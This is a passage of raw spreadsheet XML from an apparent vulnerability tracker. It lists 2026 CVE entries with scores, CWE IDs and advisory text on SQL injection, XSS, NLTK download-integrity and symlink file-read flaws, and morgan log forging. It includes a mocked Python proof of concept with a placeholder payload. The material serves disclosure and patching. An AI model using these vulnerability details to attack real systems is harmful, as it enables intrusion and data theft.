t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86515</t></is></c></row><row r="1553"><c r="A1553" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1553" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1553" s="5" t="inlineStr"><is><t>CVE-2026-86517</t></is></c><c r="D1553" s="5" t="n"><v>2.1</v></c><c r="E1553" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1553" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1553" s="5" t="inlineStr" /><c r="H1553" s="5" t="n"><v>0.002</v></c><c r="I1553" s="5" t="inlineStr" /><c r="J1553" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1553" s="5" t="inlineStr" /><c r="L1553" s="5" t="inlineStr" /><c r="M1553" s="5" t="inlineStr" /><c r="N1553" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1553" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1553" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1553" s="5" t="inlineStr" /><c r="R1553" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1553" s="5" t="inlineStr"><is><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is></c><c r="T1553" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86517</t></is></c></row><row r="1554"><c r="A1554" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1554" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1554" s="5" t="inlineStr"><is><t>CVE-2026-86518</t></is></c><c r="D1554" s="5" t="n"><v>2.1</v></c><c r="E1554" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1554" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1554" s="5" t="inlineStr" /><c r="H1554" s="5" t="n"><v>0.002</v></c><c r="I1554" s="5" t="inlineStr" /><c r="J1554" s="5" t="inlineStr" /><c r="K1554" s="5" t="inlineStr" /><c r="L1554" s="5" t="inlineStr" /><c r="M1554" s="5" t="inlineStr" /><c r="N1554" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1554" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1554" s="5" t="inlineStr" /><c r="R1554" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1554" s="5" t="inlineStr"><is><t>A vulnerability has been found in code-projects Student Crud Operation 1.0. This affects an unknown function of the file /edit.php. The manipulation of the argument ID leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.</t></is></c><c r="T1554" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86518</t></is></c></row><row r="1555"><c r="A1555" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1555" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1555" s="5" t="inlineStr"><is><t>CVE-2026-86668</t></is></c><c r="D1555" s="5" t="n"><v>2.1</v></c><c r="E1555" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1555" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1555" s="5" t="inlineStr" /><c r="H1555" s="5" t="n"><v>0.003</v></c><c r="I1555" s="5" t="inlineStr" /><c r="J1555" s="5" t="inlineStr" /><c r="K1555" s="5" t="inlineStr" /><c r="L1555" s="5" t="inlineStr" /><c r="M1555" s="5" t="inlineStr" /><c r="N1555" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1555" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1555" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1555" s="5" t="inlineStr" /><c r="R1555" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1555" s="5" t="inlineStr"><is><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is></c><c r="T1555" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86668</t></is></c></row><row r="1556"><c r="A1556" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1556" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1556" s="5" t="inlineStr"><is><t>CVE-2026-86674</t></is></c><c r="D1556" s="5" t="n"><v>2.1</v></c><c r="E1556" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1556" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1556" s="5" t="inlineStr" /><c r="H1556" s="5" t="n"><v>0.002</v></c><c r="I1556" s="5" t="inlineStr" /><c r="J1556" s="5" t="inlineStr" /><c r="K1556" s="5" t="inlineStr" /><c r="L1556" s="5" t="inlineStr" /><c r="M1556" s="5" t="inlineStr" /><c r="N1556" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1556" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1556" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1556" s="5" t="inlineStr" /><c r="R1556" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S1556" s="5" t="inlineStr"><is><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is></c><c r="T1556" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86674</t></is></c></row><row r="1557"><c r="A1557" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1557" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1557" s="5" t="inlineStr"><is><t>CVE-2026-86675</t></is></c><c r="D1557" s="5" t="n"><v>2.1</v></c><c r="E1557" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1557" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1557" s="5" t="inlineStr" /><c r="H1557" s="5" t="n"><v>0.002</v></c><c r="I1557" s="5" t="inlineStr" /><c r="J1557" s="5" t="inlineStr" /><c r="K1557" s="5" t="inlineStr" /><c r="L1557" s="5" t="inlineStr" /><c r="M1557" s="5" t="inlineStr" /><c r="N1557" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1557" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1557" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1557" s="5" t="inlineStr" /><c r="R1557" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1557" s="5" t="inlineStr"><is><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is></c><c r="T1557" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86675</t></is></c></row><row r="1558"><c r="A1558" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1558" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1558" s="5" t="inlineStr"><is><t>CVE-2026-16003</t></is></c><c r="D1558" s="5" t="n"><v>2</v></c><c r="E1558" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1558" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1558" s="5" t="inlineStr" /><c r="H1558" s="5" t="n"><v>0.001</v></c><c r="I1558" s="5" t="inlineStr" /><c r="J1558" s="5" t="inlineStr" /><c r="K1558" s="5" t="inlineStr" /><c r="L1558" s="5" t="inlineStr" /><c r="M1558" s="5" t="inlineStr" /><c r="N1558" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1558" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1558" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1558" s="5" t="inlineStr" /><c r="R1558" s="5" t="inlineStr"><is><t>CWE-782</t></is></c><c r="S1558" s="5" t="inlineStr"><is><t>Exposed IOCTL with Insufficient Access Control in Armoury Crate driver allows a local user to add an arbitrary process identifier to the driver's whitelist via a crafted IOCTL request by bypassing the driver's verification.Refer to the '
Security Update for Armoury Crate App  ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1558" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-16003</t></is></c></row><row r="1559"><c r="A1559" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1559" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1559" s="5" t="inlineStr"><is><t>CVE-2026-86644</t></is></c><c r="D1559" s="5" t="n"><v>2</v></c><c r="E1559" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1559" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1559" s="5" t="inlineStr" /><c r="H1559" s="5" t="n"><v>0.003</v></c><c r="I1559" s="5" t="inlineStr" /><c r="J1559" s="5" t="inlineStr" /><c r="K1559" s="5" t="inlineStr" /><c r="L1559" s="5" t="inlineStr" /><c r="M1559" s="5" t="inlineStr" /><c r="N1559" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1559" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1559" s="5" t="inlineStr" /><c r="R1559" s="5" t="inlineStr"><is><t>CWE-79, CWE-94</t></is></c><c r="S1559" s="5" t="inlineStr"><is><t>A vulnerability was determined in star7th showdoc up to 3.9.1. This vulnerability affects unknown code of the file web_src/public/editor.md/editormd.js of the component API Page Save Endpoint. Executing a manipulation can lead to cross site scripting. The attack may be launched remotely. The exploit has been publicly disclosed and may be utilized. Upgrading to version 3.9.2 is able to resolve this issue. This patch is called a8ea1520850b4242f395247f72e87e597506cef0. Upgrading the affected component is recommended. The vendor confirms: "The fix [...] sets Mermaid `securityLevel` to `strict`, disables `htmlLabels`, and sanitizes rendered SVG with DOMPurify."</t></is></c><c r="T1559" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86644</t></is></c></row><row r="1560"><c r="A1560" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1560" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1560" s="5" t="inlineStr"><is><t>CVE-2026-86667</t></is></c><c r="D1560" s="5" t="n"><v>2</v></c><c r="E1560" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1560" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1560" s="5" t="inlineStr" /><c r="H1560" s="5" t="n"><v>0.002</v></c><c r="I1560" s="5" t="inlineStr" /><c r="J1560" s="5" t="inlineStr" /><c r="K1560" s="5" t="inlineStr" /><c r="L1560" s="5" t="inlineStr" /><c r="M1560" s="5" t="inlineStr" /><c r="N1560" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1560" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1560" s="5" t="inlineStr" /><c r="R1560" s="5" t="inlineStr"><is><t>CWE-74, CWE-89</t></is></c><c r="S1560" s="5" t="inlineStr"><is><t>A weakness has been identified in aircheng-org iWebShop-5 up to 5.15. The affected element is the function member_list of the file controllers/member.php. This manipulation of the argument Search causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1560" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86667</t></is></c></row><row r="1561"><c r="A1561" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1561" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1561" s="5" t="inlineStr"><is><t>CVE-2026-9215</t></is></c><c r="D1561" s="5" t="n"><v>1.8</v></c><c r="E1561" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1561" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1561" s="5" t="inlineStr" /><c r="H1561" s="5" t="n"><v>0.001</v></c><c r="I1561" s="5" t="inlineStr" /><c r="J1561" s="5" t="inlineStr" /><c r="K1561" s="5" t="inlineStr"><is><t>netgear:xr1000, netgear:xr1000_firmware, netgear:xr1000v2, netgear:xr1000v2_firmware, netgear:xr500, netgear:xr500_firmware</t></is></c><c r="L1561" s="5" t="inlineStr" /><c r="M1561" s="5" t="inlineStr" /><c r="N1561" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1561" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1561" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1561" s="5" t="inlineStr" /><c r="R1561" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1561" s="5" t="inlineStr"><is><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is></c><c r="T1561" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9215</t></is></c></row><row r="1562"><c r="A1562" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1562" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1562" s="5" t="inlineStr"><is><t>CVE-2026-9216</t></is></c><c r="D1562" s="5" t="n"><v>1.2</v></c><c r="E1562" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1562" s="5" t="inlineStr"><is><t>a2826606-91e7-4eb6-899e-8484bd4575d5</t></is></c><c r="G1562" s="5" t="inlineStr" /><c r="H1562" s="5" t="n"><v>0.002</v></c><c r="I1562" s="5" t="inlineStr" /><c r="J1562" s="5" t="inlineStr" /><c r="K1562" s="5" t="inlineStr"><is><t>netgear:rax30, netgear:rax30_firmware, netgear:rax35, netgear:rax35_firmware, netgear:rax38, netgear:rax38_firmware, netgear:rax40, netgear:rax40_firmware, netgear:raxe300, netgear:raxe300_firmware</t></is></c><c r="L1562" s="5" t="inlineStr" /><c r="M1562" s="5" t="inlineStr" /><c r="N1562" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1562" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1562" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1562" s="5" t="inlineStr" /><c r="R1562" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S1562" s="5" t="inlineStr"><is><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is></c><c r="T1562" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9216</t></is></c></row><row r="1563"><c r="A1563" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1563" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1563" s="5" t="inlineStr"><is><t>CVE-2026-12259</t></is></c><c r="D1563" s="5" t="inlineStr" /><c r="E1563" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1563" s="5" t="inlineStr" /><c r="H1563" s="5" t="n"><v>0.001</v></c><c r="I1563" s="5" t="inlineStr" /><c r="J1563" s="5" t="inlineStr" /><c r="K1563" s="5" t="inlineStr" /><c r="L1563" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1563" s="5" t="inlineStr"><is><t>3.9.3</t></is></c><c r="N1563" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1563" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1563" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1563" s="5" t="inlineStr" /><c r="R1563" s="5" t="inlineStr" /><c r="S1563" s="5" t="inlineStr"><is><t>NLTK's package downloader in nltk/downloader.py does not verify file integrity after download and before extraction.

The download flow at lines 789-825:
1. File is downloaded to a temp path via HTTP
2. os.replace(tmp_filepath, filepath) moves it to the final location (line 799)
3. Extraction begins via _unzip_iter() (line 825)

Between steps 2 and 3, there is no SHA-256 verification. The checksum logic exists in _pkg_status() (lines 982-1015) but it is only used BEFORE download as a status check ("is this package already installed and up-to-date?"). It is never called after download to verify the file that was actually received.

Attack vectors:
1. MITM during HTTP download (NLTK downloads from http:// by default on some mirrors)
2. Race condition on shared filesystems (attacker replaces file between os.replace and _unzip_iter)
3. DNS poisoning redirecting to attacker-controlled server

PoC:
```python
import nltk
import unittest.mock
import zipfile
import io
import os

# Create a malicious zip that will be "downloaded"
malicious_zip = io.BytesIO()
with zipfile.ZipFile(malicious_zip, 'w') as zf:
    zf.writestr('punkt_tab/tokenizers/punkt_tab/english.pickle', 
                b'MALICIOUS PAYLOAD - attacker controlled content')

# Patch urllib to return our malicious zip
with unittest.mock.patch('urllib.request.urlopen') as mock_urlopen:
    mock_response = unittest.mock.MagicMock()
    mock_response.read.return_value = malicious_zip.getvalue()
    mock_response.headers = {'Content-Length': str(len(malicious_zip.getvalue()))}
    mock_urlopen.return_value = mock_response
    
    # Download proceeds, no integrity check catches the swap
    # nltk.download('punkt_tab')  # Would install attacker payload
```

This is distinct from CVE-2024-39705 (pickle deserialization via download) and CVE-2025-14009 (zip-slip path traversal). Those address what happens AFTER extraction. This finding addresses the gap BEFORE extraction where integrity is never verified.

Suggested fix: After os.replace() and before _unzip_iter(), compute SHA-256 of the final file and compare against the expected checksum from the package index. Reject and delete the file if the hash does not match.</t></is></c><c r="T1563" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12259</t></is></c></row><row r="1564"><c r="A1564" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1564" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1564" s="5" t="inlineStr"><is><t>CVE-2026-15603</t></is></c><c r="D1564" s="5" t="inlineStr" /><c r="E1564" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1564" s="5" t="inlineStr" /><c r="H1564" s="5" t="n"><v>0.002</v></c><c r="I1564" s="5" t="inlineStr" /><c r="J1564" s="5" t="inlineStr" /><c r="K1564" s="5" t="inlineStr" /><c r="L1564" s="5" t="inlineStr"><is><t>npm:morgan</t></is></c><c r="M1564" s="5" t="inlineStr"><is><t>1.12.0</t></is></c><c r="N1564" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1564" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1564" s="5" t="inlineStr" /><c r="R1564" s="5" t="inlineStr" /><c r="S1564" s="5" t="inlineStr"><is><t>### Impact

Morgan writes attacker-controlled request data to the access log through its tokens. The 1.11.0 fix neutralizes C0 control characters, DEL, and backslash, but it does not escape the Unicode line separators `U+0085` (NEL), `U+2028` (LINE SEPARATOR), or `U+2029` (PARAGRAPH SEPARATOR). These code points are reachable through several tokens, including the request URL (`:url`), request headers such as `:user-agent` and `:referrer`, arbitrary `:req[header]` values, and the Basic auth username (`:remote-user`). NEL is valid `obs-text` in HTTP header values, so an attacker can place it in an ordinary request header.

When such a value is logged, the raw code points survive into the emitted access-log record, and downstream ECMAScript-aware or Unicode-aware log processing splits the single physical record into multiple logical records. This allows an attacker to forge log entries. The built-in `combined`, `common`, `default`, and `short` formats are affected, as well as any custom format. This is an incomplete fix of CVE-2026-5078.

### Patches

Users should upgrade to version 1.12.0.

### Workarounds

None. The affected values include the request URL and request headers, which are core to access logging, so there is no practical format-based mitigation. Upgrade to 1.12.0.</t></is></c><c r="T1564" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-15603</t></is></c></row><row r="1565"><c r="A1565" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1565" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1565" s="5" t="inlineStr"><is><t>CVE-2026-45219</t></is></c><c r="D1565" s="5" t="inlineStr" /><c r="E1565" s="5" t="inlineStr" /><c r="F1565" s="5" t="inlineStr" /><c r="G1565" s="5" t="inlineStr" /><c r="H1565" s="5" t="inlineStr" /><c r="I1565" s="5" t="inlineStr" /><c r="J1565" s="5" t="inlineStr" /><c r="K1565" s="5" t="inlineStr" /><c r="L1565" s="5" t="inlineStr" /><c r="M1565" s="5" t="inlineStr" /><c r="N1565" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1565" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1565" s="5" t="inlineStr" /><c r="R1565" s="5" t="inlineStr" /><c r="S1565" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1565" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45219</t></is></c></row><row r="1566"><c r="A1566" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1566" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1566" s="5" t="inlineStr"><is><t>CVE-2026-45220</t></is></c><c r="D1566" s="5" t="inlineStr" /><c r="E1566" s="5" t="inlineStr" /><c r="F1566" s="5" t="inlineStr" /><c r="G1566" s="5" t="inlineStr" /><c r="H1566" s="5" t="inlineStr" /><c r="I1566" s="5" t="inlineStr" /><c r="J1566" s="5" t="inlineStr" /><c r="K1566" s="5" t="inlineStr" /><c r="L1566" s="5" t="inlineStr" /><c r="M1566" s="5" t="inlineStr" /><c r="N1566" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1566" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1566" s="5" t="inlineStr" /><c r="R1566" s="5" t="inlineStr" /><c r="S1566" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1566" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45220</t></is></c></row><row r="1567"><c r="A1567" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1567" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1567" s="5" t="inlineStr"><is><t>CVE-2026-49153</t></is></c><c r="D1567" s="5" t="inlineStr" /><c r="E1567" s="5" t="inlineStr" /><c r="F1567" s="5" t="inlineStr" /><c r="G1567" s="5" t="inlineStr" /><c r="H1567" s="5" t="inlineStr" /><c r="I1567" s="5" t="inlineStr" /><c r="J1567" s="5" t="inlineStr" /><c r="K1567" s="5" t="inlineStr" /><c r="L1567" s="5" t="inlineStr" /><c r="M1567" s="5" t="inlineStr" /><c r="N1567" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1567" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1567" s="5" t="inlineStr" /><c r="R1567" s="5" t="inlineStr" /><c r="S1567" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1567" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49153</t></is></c></row><row r="1568"><c r="A1568" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1568" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1568" s="5" t="inlineStr"><is><t>CVE-2026-49154</t></is></c><c r="D1568" s="5" t="inlineStr" /><c r="E1568" s="5" t="inlineStr" /><c r="F1568" s="5" t="inlineStr" /><c r="G1568" s="5" t="inlineStr" /><c r="H1568" s="5" t="inlineStr" /><c r="I1568" s="5" t="inlineStr" /><c r="J1568" s="5" t="inlineStr" /><c r="K1568" s="5" t="inlineStr" /><c r="L1568" s="5" t="inlineStr" /><c r="M1568" s="5" t="inlineStr" /><c r="N1568" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1568" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1568" s="5" t="inlineStr" /><c r="R1568" s="5" t="inlineStr" /><c r="S1568" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1568" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49154</t></is></c></row><row r="1569"><c r="A1569" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1569" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1569" s="5" t="inlineStr"><is><t>CVE-2026-49155</t></is></c><c r="D1569" s="5" t="inlineStr" /><c r="E1569" s="5" t="inlineStr" /><c r="F1569" s="5" t="inlineStr" /><c r="G1569" s="5" t="inlineStr" /><c r="H1569" s="5" t="inlineStr" /><c r="I1569" s="5" t="inlineStr" /><c r="J1569" s="5" t="inlineStr" /><c r="K1569" s="5" t="inlineStr" /><c r="L1569" s="5" t="inlineStr" /><c r="M1569" s="5" t="inlineStr" /><c r="N1569" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1569" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1569" s="5" t="inlineStr" /><c r="R1569" s="5" t="inlineStr" /><c r="S1569" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1569" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49155</t></is></c></row><row r="1570"><c r="A1570" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1570" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1570" s="5" t="inlineStr"><is><t>CVE-2026-49156</t></is></c><c r="D1570" s="5" t="inlineStr" /><c r="E1570" s="5" t="inlineStr" /><c r="F1570" s="5" t="inlineStr" /><c r="G1570" s="5" t="inlineStr" /><c r="H1570" s="5" t="inlineStr" /><c r="I1570" s="5" t="inlineStr" /><c r="J1570" s="5" t="inlineStr" /><c r="K1570" s="5" t="inlineStr" /><c r="L1570" s="5" t="inlineStr" /><c r="M1570" s="5" t="inlineStr" /><c r="N1570" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1570" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1570" s="5" t="inlineStr" /><c r="R1570" s="5" t="inlineStr" /><c r="S1570" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1570" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49156</t></is></c></row><row r="1571"><c r="A1571" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1571" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1571" s="5" t="inlineStr"><is><t>CVE-2026-50646</t></is></c><c r="D1571" s="5" t="inlineStr" /><c r="E1571" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1571" s="5" t="inlineStr" /><c r="H1571" s="5" t="n"><v>0.01</v></c><c r="I1571" s="5" t="inlineStr" /><c r="J1571" s="5" t="inlineStr" /><c r="K1571" s="5" t="inlineStr" /><c r="L1571" s="5" t="inlineStr"><is><t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t></is></c><c r="M1571" s="5" t="inlineStr"><is><t>10.0.10, 8.0.29, 9.0.18</t></is></c><c r="N1571" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1571" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1571" s="5" t="inlineStr" /><c r="R1571" s="5" t="inlineStr" /><c r="S1571" s="5" t="inlineStr"><is><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is></c><c r="T1571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t></is></c></row><row r="1572"><c r="A1572" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1572" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1572" s="5" t="inlineStr"><is><t>CVE-2026-62383</t></is></c><c r="D1572" s="5" t="inlineStr" /><c r="E1572" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1572" s="5" t="inlineStr" /><c r="H1572" s="5" t="n"><v>0.002</v></c><c r="I1572" s="5" t="inlineStr" /><c r="J1572" s="5" t="inlineStr" /><c r="K1572" s="5" t="inlineStr" /><c r="L1572" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M1572" s="5" t="inlineStr"><is><t>3.10.2</t></is></c><c r="N1572" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1572" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1572" s="5" t="inlineStr" /><c r="R1572" s="5" t="inlineStr" /><c r="S1572" s="5" t="inlineStr"><is><t>## Summary

`IPIPANCorpusReader` (`nltk/corpus/reader/ipipan.py`) exposes public methods, `channels()`, `domains()`, `categories()`, and `fileids(channels=...)`, that accept a caller supplied `fileids` list and read a file via a completely unprotected builtin `open()` call, with no `nltk.pathsec` involvement at all. A symlink placed inside the corpus root, with a name containing no separators or `..`, passes NLTK's existing traversal checks and is opened directly, reading a file from anywhere on the filesystem the process can access.

## Root cause

All four methods route through `_get_tag()`:

```python
def _get_tag(self, f, tag):
    tags = []
